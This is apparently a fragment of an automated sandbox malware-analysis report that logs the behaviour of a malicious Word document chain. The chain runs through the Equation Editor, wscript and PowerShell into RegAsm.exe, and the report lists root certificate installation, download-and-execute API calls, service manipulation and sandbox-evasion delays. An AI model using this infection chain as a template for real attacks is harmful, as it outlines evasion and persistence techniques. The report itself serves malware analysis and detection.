                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00406EEB ShellExecuteW,URLDownloadToFileW,9_2_00406EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AADB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040F7E2 Sleep,ExitProcess,9_2_0040F7E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,9_2_0041A7D9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1671Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4872Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 946Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9333Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1642Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_9-53718
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3388Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep count: 4872 > 30Jump to behavior
